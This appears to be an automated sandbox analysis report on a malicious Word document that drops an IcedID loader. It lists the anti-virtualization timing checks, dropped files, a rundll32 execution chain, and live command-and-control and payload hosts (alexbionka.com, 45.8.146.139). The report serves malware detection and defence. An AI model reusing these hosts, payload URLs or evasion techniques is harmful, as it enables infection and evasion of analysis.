Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180002AC0 SwitchToThread,SwitchToThread, 5_2_0000000180002AC0
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180002174 rdtsc 5_2_0000000180002174
Contains functionality to query network adapater information
Source: C:\Windows\System32\rundll32.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_000000018000133C
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_000000018000108C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_0000000180001C28
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180002174 rdtsc 5_2_0000000180002174
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_00041189 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00041189

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 64.227.108.27 80 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Domain query: alexbionka.com
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_00041593 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 4_2_00041593
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW, 5_2_0000000180002018

Stealing of Sensitive Information
barindex
Yara detected IcedID
Source: Yara match File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

Remote Access Functionality
barindex
Yara detected IcedID
Source: Yara match File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 682555 Sample: dodsonimaging,file,08.11.2022.doc Startdate: 11/08/2022 Architecture: WINDOWS Score: 100 30 Malicious sample detected (through community Yara rule) 2->30 32 Antivirus detection for dropped file 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 9 other signatures 2->36 7 WINWORD.EXE 302 50 2->7         started        process3 dnsIp4 26 45.8.146.139, 49171, 80 VMAGE-ASRU Russian Federation 7->26 18 C:\Users\user\AppData\Local\...\y84FE.tmp.dll, PE32+ 7->18 dropped 20 C:\Users\user\AppData\Local\...\r8F8A.tmp.exe, PE32 7->20 dropped 22 loader_p3_dll_64_n...m_clone_n152[1].dll, PE32+ 7->22 dropped 24 C:\Users\user\...\~DF4786325F45128C5F.TMP, Composite 7->24 dropped 38 Document exploit detected (creates forbidden files) 7->38 12 r8F8A.tmp.exe 7->12         started        file5 signatures6 process7 process8 14 rundll32.exe 12->14         started        dnsIp9 28 alexbionka.com 64.227.108.27, 49172, 80 DIGITALOCEAN-ASNUS United States 14->28 40 System process connects to network (likely due to code injection or exploit) 14->40 42 Contains functionality to detect hardware virtualization (CPUID execution measurement) 14->42 44 Tries to detect virtualization through RDTSC time measurements 14->44 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.8.146.139
 unknown Russian Federation
44676 VMAGE-ASRU false
64.227.108.27
 alexbionka.com United States
14061 DIGITALOCEAN-ASNUS true

Contacted Domains

Name IP Active
alexbionka.com 64.227.108.27 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
alexbionka.com true
  • Avira URL Cloud: safe
 unknown
http://alexbionka.com/ true
  • Avira URL Cloud: safe
 unknown
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm false
  • Avira URL Cloud: safe
 unknown